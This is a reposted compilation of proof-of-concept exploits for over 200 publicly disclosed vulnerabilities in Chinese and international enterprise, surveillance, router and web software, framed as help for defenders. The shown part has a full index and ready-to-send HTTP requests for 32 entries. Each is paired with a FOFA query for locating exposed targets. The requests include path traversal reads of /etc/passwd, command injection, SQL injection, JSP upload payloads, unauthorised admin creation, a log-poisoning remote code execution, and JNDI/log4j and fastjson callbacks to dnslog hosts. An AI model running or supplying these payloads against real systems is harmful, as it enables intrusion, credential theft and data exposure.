Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks, so we hope this article gives defenders some help. Defenders can use its contents to triage their own exposure.

Sources: the article covers 203 POCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any of this content infringes a party's lawful rights, contact the 网络安全新视界 team through the account's back end to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; press F12 and search for keywords when using it.

Bookmark this article if you need it, and feel free to follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management centre session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 back end sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. Lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardisation management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardisation management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualisation system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin console with the default account admin, then perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=(cookie obtained from the step-one login)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword…
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the injected function executes its argument after base64-decoding it.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to execute the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
